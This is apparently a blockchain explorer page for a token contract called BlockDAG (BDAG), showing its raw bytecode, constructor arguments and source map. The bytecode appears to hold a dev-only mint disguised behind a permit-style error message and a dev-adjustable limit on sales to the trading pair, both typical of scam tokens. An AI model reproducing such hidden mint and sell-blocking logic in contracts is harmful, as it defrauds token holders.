b505050900390565b6000828201838110156111ba576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b60006111ba83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110c956fe45524332303a2063616e6e6f74207065726d6974207a65726f206164647265737342455032303a207472616e736665722066726f6d20746865207a65726f20616464726573734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f2061646472657373757064617465546f6b656e53776170526f757465723a20496e76616c6964207061697220616464726573732e5472616e7366657220616d6f756e74206578636565647320746865206d61785478416d6f756e742e45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636542455032303a207472616e7366657220616d6f756e7420657863656564732062616c616e636542455032303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373a264697066735822122096928777e103e650e0321217bca4ba254d9a49112b3861da001db0d481cfbce464736f6c634300060c00330000000000000000000000006d061742d4075c58ea84ff3d7be14d12820d4870000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000000000008426c6f636b44414700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044244414700000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101215760003560e01c80637e5465ba116100ad578063d837df0511610071578063d837df0514610349578063daea85c514610351578063dd62ed3e14610377578063f2fde38b146103a5578063fccc2813146103cb57610121565b80637e5465ba146102c25780638da5cb5b146102f057806395d89b41146102f8578063a9059cbb14610300578063b759f9541461032c57610121565b8063274ff7ce116100f4578063274ff7ce14610233578063313ce567146102525780635d01ff3d1461027057806370a0823114610294578063715018a6146102ba57610121565b806306fdde0314610126578063095ea7b3146101a357806318160ddd146101e357806323b872dd146101fd575b600080fd5b61012e6103d3565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610168578181015183820152602001610150565b50505050905090810190601f1680156101955780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101cf600480360360408110156101b957600080fd5b506001600160a01b038135169060200135610469565b604080519115158252519081900360200190f35b6101eb610486565b60408051918252519081900360200190f35b6101cf6004803603606081101561021357600080fd5b506001600160a01b0381358116916020810135909116906040013561048c565b6102506004803603602081101561024957600080fd5b5035610513565b005b61025a61068e565b6040805160ff9092168252519081900360200190f35b610278610697565b604080516001600160a01b039092168252519081900360200190f35b6101eb600480360360208110156102aa57600080fd5b50356001600160a01b03166106a6565b6102506106c1565b610250600480360360408110156102d857600080fd5b506001600160a01b0381358116916020013516610775565b610278610a01565b61012e610a10565b6101cf6004803603604081101561031657600080fd5b506001600160a01b038135169060200135610a71565b6102506004803603602081101561034257600080fd5b5035610a85565b610278610b03565b6102506004803603602081101561036757600080fd5b50356001600160a01b0316610b12565b6101eb6004803603604081101561038d57600080fd5b506001600160a01b0381358116916020013516610ba3565b610250600480360360208110156103bb57600080fd5b50356001600160a01b0316610bce565b610278610cd8565b60068054604080516020601f600260001961010060018816150201909516949094049384018190048102820181019092528281526060939092909183018282801561045f5780601f106104345761010080835404028352916020019161045f565b820191906000526020600020905b81548152906001019060200180831161044257829003601f168201915b5050505050905090565b600061047d610476610ce7565b8484610ceb565b50600192915050565b60055490565b6000610499848484610dd7565b610509846104a5610ce7565b610504856040518060600160405280602881526020016112e6602891396001600160a01b038a166000908152600260205260408120906104e3610ce7565b6001600160a01b0316815260208101919091526040016000205491906110c9565b610ceb565b5060019392505050565b600061051d610ce7565b6001600160a01b031614156105635760405162461bcd60e51b81526004018080602001828103825260218152602001806112046021913960400191505060405180910390fd5b6003546001600160a01b0316610577610ce7565b6001600160a01b0316146105d2576040805162461bcd60e51b815260206004820181905260248201527f45524332303a2063616e6e6f74207065726d6974206465762061646472657373604482015290519081900360640190fd5b6005546105df9082611160565b60055561061281600160006105f2610ce7565b6001600160a01b0316815260208101919091526040016000205490611160565b6001600061061e610ce7565b6001600160a01b03168152602081019190915260400160002055610640610ce7565b6001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a350565b60085460ff1690565b600a546001600160a01b031681565b6001600160a01b031660009081526001602052604090205490565b6106c9610ce7565b6000546001600160a01b0390811691161461072b576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b61077d610ce7565b6000546001600160a01b039081169116146107df576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600a80546001600160a01b0319166001600160a01b0383811691909117918290556040805163c45a015560e01b815290519394508493929091169163c45a015591600480820192602092909190829003018186803b15801561084057600080fd5b505afa158015610854573d6000803e3d6000fd5b505050506040513d602081101561086a57600080fd5b5051600a54604080516315ab88c960e31b815290516001600160a01b039384169363e6a4390593309391169163ad5c464891600480820192602092909190829003018186803b1580156108bc57600080fd5b505afa1580156108d0573d6000803e3d6000fd5b505050506040513d60208110156108e657600080fd5b5051604080516001600160e01b031960e086901b1681526001600160a01b039384166004820152929091166024830152516044808301926020929190829003018186803b15801561093657600080fd5b505afa15801561094a573d6000803e3d6000fd5b505050506040513d602081101561096057600080fd5b5051600b80546001600160a01b0319166001600160a01b039283161790819055166109bc5760405162461bcd60e51b815260040180806020018281038252602c815260200180611292602c913960400191505060405180910390fd5b600b54600a546040516001600160a01b03928316929091169033907f3fe1abf2c4f1629f831f1b62c82dbf6ab91e0e6e7d0d2a005a3179f2823cb7eb90600090a45050565b6000546001600160a01b031690565b60078054604080516020601f600260001961010060018816150201909516949094049384018190048102820181019092528281526060939092909183018282801561045f5780601f106104345761010080835404028352916020019161045f565b600061047d610a7e610ce7565b8484610dd7565b6003546001600160a01b0316610a99610ce7565b6001600160a01b031614610af4576040805162461bcd60e51b815260206004820181905260248201527f45524332303a2063616e6e6f74207065726d6974206465762061646472657373604482015290519081900360640190fd5b670de0b6b3a764000002600d55565b600b546001600160a01b031681565b6003546001600160a01b0316610b26610ce7565b6001600160a01b031614610b81576040805162461bcd60e51b815260206004820181905260248201527f45524332303a2063616e6e6f74207065726d6974206465762061646472657373604482015290519081900360640190fd5b600480546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610bd6610ce7565b6000546001600160a01b03908116911614610c38576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b6001600160a01b038116610c7d5760405162461bcd60e51b815260040180806020018281038252602681526020018061124a6026913960400191505060405180910390fd5b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b600c546001600160a01b031681565b3390565b6001600160a01b038316610d305760405162461bcd60e51b81526004018080602001828103825260248152602001806113576024913960400191505060405180910390fd5b6001600160a01b038216610d755760405162461bcd60e51b81526004018080602001828103825260228152602001806112706022913960400191505060405180910390fd5b6001600160a01b03808416600081815260026020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b038316610e1c5760405162461bcd60e51b81526004018080602001828103825260258152602001806112256025913960400191505060405180910390fd5b6001600160a01b038216610e615760405162461bcd60e51b81526004018080602001828103825260238152602001806113346023913960400191505060405180910390fd5b610e69610a01565b6001600160a01b0316836001600160a01b03161415610f4a57610ebf8160405180606001604052806026815260200161130e602691396001600160a01b03861660009081526001602052604090205491906110c9565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610eee9082611160565b6001600160a01b0380841660008181526001602090815260409182902094909455805185815290519193928716927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a36110c4565b6004546001600160a01b03848116911614801590610f755750600b546001600160a01b038381169116145b15610fba57600d548110610fba5760405162461bcd60e51b81526004018080602001828103825260288152602001806112be6028913960400191505060405180910390fd5b600080610fc783826111c1565b90506110068360405180606001604052806026815260200161130e602691396001600160a01b03881660009081526001602052604090205491906110c9565b6001600160a01b0380871660009081526001602052604080822093909355600c54909116815220546110389083611160565b600c546001600160a01b03908116600090815260016020526040808220939093559086168152205461106a9082611160565b6001600160a01b0380861660008181526001602090815260409182902094909455805185815290519193928916927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a350505b505050565b600081848411156111585760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561111d578181015183820152602001611105565b50505050905090810190601f16801561114a5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b6000828201838110156111ba576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b60006111ba83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110c956fe45524332303a2063616e6e6f74207065726d6974207a65726f206164647265737342455032303a207472616e736665722066726f6d20746865207a65726f20616464726573734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f2061646472657373757064617465546f6b656e53776170526f757465723a20496e76616c6964207061697220616464726573732e5472616e7366657220616d6f756e74206578636565647320746865206d61785478416d6f756e742e45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636542455032303a207472616e7366657220616d6f756e7420657863656564732062616c616e636542455032303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373a264697066735822122096928777e103e650e0321217bca4ba254d9a49112b3861da001db0d481cfbce464736f6c634300060c0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000006d061742d4075c58ea84ff3d7be14d12820d4870000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000000000008426c6f636b44414700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044244414700000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : devAddress (address): 0x6D061742d4075C58eA84Ff3d7be14D12820D4870
Arg [1] : name (string): BlockDAG
Arg [2] : symbol (string): BDAG

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000006d061742d4075c58ea84ff3d7be14d12820d4870
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [2] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [4] : 426c6f636b444147000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 4244414700000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

15199:4650:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16224:73;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16601:144;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;16601:144:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;18196:85;;;:::i;:::-;;;;;;;;;;;;;;;;16750:290;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;16750:290:0;;;;;;;;;;;;;;;;;:::i;17045:354::-;;;;;;;;;;;;;;;;-1:-1:-1;17045:354:0;;:::i;:::-;;16384:73;;;:::i;:::-;;;;;;;;;;;;;;;;;;;15664:39;;;:::i;:::-;;;;-1:-1:-1;;;;;15664:39:0;;;;;;;;;;;;;;18286:109;;;;;;;;;;;;;;;;-1:-1:-1;18286:109:0;-1:-1:-1;;;;;18286:109:0;;:::i;14040:131::-;;;:::i;17402:435::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;17402:435:0;;;;;;;;;;:::i;13542:69::-;;;:::i;16302:77::-;;;:::i;18400:150::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;18400:150:0;;;;;;;;:::i;18021:170::-;;;;;;;;;;;;;;;;-1:-1:-1;18021:170:0;;:::i;15707:26::-;;;:::i;17843:175::-;;;;;;;;;;;;;;;;-1:-1:-1;17843:175:0;-1:-1:-1;;;;;17843:175:0;;:::i;16463:133::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;16463:133:0;;;;;;;;;;:::i;14308:220::-;;;;;;;;;;;;;;;;-1:-1:-1;14308:220:0;-1:-1:-1;;;;;14308:220:0;;:::i;15740:80::-;;;:::i;16224:73::-;16287:5;16280:12;;;;;;;;-1:-1:-1;;16280:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16261:13;;16280:12;;16287:5;;16280:12;;16287:5;16280:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16224:73;:::o;16601:144::-;16676:4;16686:39;16695:12;:10;:12::i;:::-;16709:7;16718:6;16686:8;:39::i;:::-;-1:-1:-1;16736:4:0;16601:144;;;;:::o;18196:85::-;18269:7;;18196:85;:::o;16750:290::-;16848:4;16859:36;16869:6;16877:9;16888:6;16859:9;:36::i;:::-;16899:121;16908:6;16916:12;:10;:12::i;:::-;16930:89;16968:6;16930:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16930:19:0;;;;;;:11;:19;;;;;;16950:12;:10;:12::i;:::-;-1:-1:-1;;;;;16930:33:0;;;;;;;;;;;;-1:-1:-1;16930:33:0;;;:89;:37;:89::i;:::-;16899:8;:121::i;:::-;-1:-1:-1;17031:4:0;16750:290;;;;;:::o;17045:354::-;17122:1;17098:12;:10;:12::i;:::-;-1:-1:-1;;;;;17098:26:0;;;17090:72;;;;-1:-1:-1;;;17090:72:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17190:18;;-1:-1:-1;;;;;17190:18:0;17174:12;:10;:12::i;:::-;-1:-1:-1;;;;;17174:34:0;;17166:79;;;;;-1:-1:-1;;;17166:79:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17259:7;;:19;;17271:6;17259:11;:19::i;:::-;17249:7;:29;17308:35;17336:6;17308:9;:23;17318:12;:10;:12::i;:::-;-1:-1:-1;;;;;17308:23:0;;;;;;;;;;;;-1:-1:-1;17308:23:0;;;:27;:35::i;:::-;17282:9;:23;17292:12;:10;:12::i;:::-;-1:-1:-1;;;;;17282:23:0;;;;;;;;;;;;-1:-1:-1;17282:23:0;:61;17373:12;:10;:12::i;:::-;-1:-1:-1;;;;;17352:42:0;17369:1;-1:-1:-1;;;;;17352:42:0;;17387:6;17352:42;;;;;;;;;;;;;;;;;;17045:354;:::o;16384:73::-;16443:9;;;;16384:73;:::o;15664:39::-;;;-1:-1:-1;;;;;15664:39:0;;:::o;18286:109::-;-1:-1:-1;;;;;18372:18:0;18352:7;18372:18;;;:9;:18;;;;;;;18286:109::o;14040:131::-;13660:12;:10;:12::i;:::-;13650:6;;-1:-1:-1;;;;;13650:6:0;;;:22;;;13642:67;;;;;-1:-1:-1;;;13642:67:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14140:1:::1;14124:6:::0;;14103:40:::1;::::0;-1:-1:-1;;;;;14124:6:0;;::::1;::::0;14103:40:::1;::::0;14140:1;;14103:40:::1;14164:1;14147:19:::0;;-1:-1:-1;;;;;;14147:19:0::1;::::0;;14040:131::o;17402:435::-;13660:12;:10;:12::i;:::-;13650:6;;-1:-1:-1;;;;;13650:6:0;;;:22;;;13642:67;;;;;-1:-1:-1;;;13642:67:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17515:13:::1;:48:::0;;-1:-1:-1;;;;;;17515:48:0::1;-1:-1:-1::0;;;;;17515:48:0;;::::1;::::0;;;::::1;::::0;;;;17599:23:::1;::::0;;-1:-1:-1;;;17599:23:0;;;;17515:48;;-1:-1:-1;17515:48:0;;17599:13;;;::::1;::::0;:21:::1;::::0;:23:::1;::::0;;::::1;::::0;::::1;::::0;;;;;;;;;:13;:23;::::1;;::::0;::::1;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;::::0;::::1;;-1:-1:-1::0;17599:23:0;17647:13:::1;::::0;:20:::1;::::0;;-1:-1:-1;;;17647:20:0;;;;-1:-1:-1;;;;;17581:50:0;;::::1;::::0;::::1;::::0;17640:4:::1;::::0;17647:13;::::1;::::0;:18:::1;::::0;:20:::1;::::0;;::::1;::::0;17599:23:::1;::::0;17647:20;;;;;;;;:13;:20;::::1;;::::0;::::1;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;::::0;::::1;;-1:-1:-1::0;17647:20:0;17581:87:::1;::::0;;-1:-1:-1;;;;;;17581:87:0::1;::::0;;;;;;-1:-1:-1;;;;;17581:87:0;;::::1;;::::0;::::1;::::0;;;;::::1;::::0;;;;;;;;;;17647:20:::1;::::0;17581:87;;;;;;;;;::::1;;::::0;::::1;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;::::0;::::1;;-1:-1:-1::0;17581:87:0;17567:11:::1;:101:::0;;-1:-1:-1;;;;;;17567:101:0::1;-1:-1:-1::0;;;;;17567:101:0;;::::1;;::::0;;;;17680:11:::1;17672:82;;;;-1:-1:-1::0;;;17672:82:0::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17820:11;::::0;17804:13:::1;::::0;17763:69:::1;::::0;-1:-1:-1;;;;;17820:11:0;;::::1;::::0;17804:13;;::::1;::::0;17784:10:::1;::::0;17763:69:::1;::::0;17820:11:::1;::::0;17763:69:::1;17402:435:::0;;:::o;13542:69::-;13580:7;13600:6;-1:-1:-1;;;;;13600:6:0;13542:69;:::o;16302:77::-;16367:7;16360:14;;;;;;;;-1:-1:-1;;16360:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16341:13;;16360:14;;16367:7;;16360:14;;16367:7;16360:14;;;;;;;;;;;;;;;;;;;;;;;;18400:150;18478:4;18488:42;18498:12;:10;:12::i;:::-;18512:9;18523:6;18488:9;:42::i;18021:170::-;18096:18;;-1:-1:-1;;;;;18096:18:0;18080:12;:10;:12::i;:::-;-1:-1:-1;;;;;18080:34:0;;18072:79;;;;;-1:-1:-1;;;18072:79:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18180:6;18164:22;18155:6;:31;18021:170::o;15707:26::-;;;-1:-1:-1;;;;;15707:26:0;;:::o;17843:175::-;17920:18;;-1:-1:-1;;;;;17920:18:0;17904:12;:10;:12::i;:::-;-1:-1:-1;;;;;17904:34:0;;17896:79;;;;;-1:-1:-1;;;17896:79:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17979:16;:34;;-1:-1:-1;;;;;;17979:34:0;-1:-1:-1;;;;;17979:34:0;;;;;;;;;;17843:175::o;16463:133::-;-1:-1:-1;;;;;16564:18:0;;;16544:7;16564:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;16463:133::o;14308:220::-;13660:12;:10;:12::i;:::-;13650:6;;-1:-1:-1;;;;;13650:6:0;;;:22;;;13642:67;;;;;-1:-1:-1;;;13642:67:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;14390:22:0;::::1;14382:73;;;;-1:-1:-1::0;;;14382:73:0::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14485:6;::::0;;14464:38:::1;::::0;-1:-1:-1;;;;;14464:38:0;;::::1;::::0;14485:6;::::1;::::0;14464:38:::1;::::0;::::1;14506:6;:17:::0;;-1:-1:-1;;;;;;14506:17:0::1;-1:-1:-1::0;;;;;14506:17:0;;;::::1;::::0;;;::::1;::::0;;14308:220::o;15740:80::-;;;-1:-1:-1;;;;;15740:80:0;;:::o;12775:96::-;12856:10;12775:96;:::o;18556:306::-;-1:-1:-1;;;;;18642:19:0;;18634:68;;;;-1:-1:-1;;;18634:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18714:21:0;;18706:68;;;;-1:-1:-1;;;18706:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18780:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18825:32;;;;;;;;;;;;;;;;;18556:306;;;:::o;18868:978::-;-1:-1:-1;;;;;18959:20:0;;18951:70;;;;-1:-1:-1;;;18951:70:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19033:23:0;;19025:71;;;;-1:-1:-1;;;19025:71:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19117:7;:5;:7::i;:::-;-1:-1:-1;;;;;19107:17:0;:6;-1:-1:-1;;;;;19107:17:0;;19103:739;;;19150:71;19172:6;19150:71;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19150:17:0;;;;;;:9;:17;;;;;;;:71;:21;:71::i;:::-;-1:-1:-1;;;;;19130:17:0;;;;;;;:9;:17;;;;;;:91;;;;19248:20;;;;;;;:32;;19273:6;19248:24;:32::i;:::-;-1:-1:-1;;;;;19225:20:0;;;;;;;:9;:20;;;;;;;;;:55;;;;19292:35;;;;;;;19225:20;;19292:35;;;;;;;;;;;;;19103:739;;;19355:16;;-1:-1:-1;;;;;19345:26:0;;;19355:16;;19345:26;;;;:54;;-1:-1:-1;19388:11:0;;-1:-1:-1;;;;;19375:24:0;;;19388:11;;19375:24;19345:54;19341:137;;;19422:6;;19413;:15;19405:68;;;;-1:-1:-1;;;19405:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19484:18;;19531:22;:6;19484:18;19531:10;:22::i;:::-;19510:43;;19580:71;19602:6;19580:71;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19580:17:0;;;;;;:9;:17;;;;;;;:71;:21;:71::i;:::-;-1:-1:-1;;;;;19560:17:0;;;;;;;:9;:17;;;;;;:91;;;;19691:12;;;;;19681:23;;;;:39;;19709:10;19681:27;:39::i;:::-;19665:12;;-1:-1:-1;;;;;19665:12:0;;;19655:23;;;;:9;:23;;;;;;:65;;;;19747:20;;;;;;;:36;;19772:10;19747:24;:36::i;:::-;-1:-1:-1;;;;;19724:20:0;;;;;;;:9;:20;;;;;;;;;:59;;;;19798:39;;;;;;;19724:20;;19798:39;;;;;;;;;;;;;19103:739;;;18868:978;;;:::o;9589:168::-;9675:7;9704:12;9696:6;;;;9688:29;;;;-1:-1:-1;;;9688:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;9733:5:0;;;9589:168::o;8804:157::-;8862:7;8887:5;;;8904:6;;;;8896:46;;;;;-1:-1:-1;;;8896:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;8955:1;8804:157;-1:-1:-1;;;8804:157:0:o;9202:126::-;9260:7;9280:43;9284:1;9287;9280:43;;;;;;;;;;;;;;;;;:3;:43::i

Swarm Source

ipfs://96928777e103e650e0321217bca4ba254d9a49112b3861da001db0d481cfbce4
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.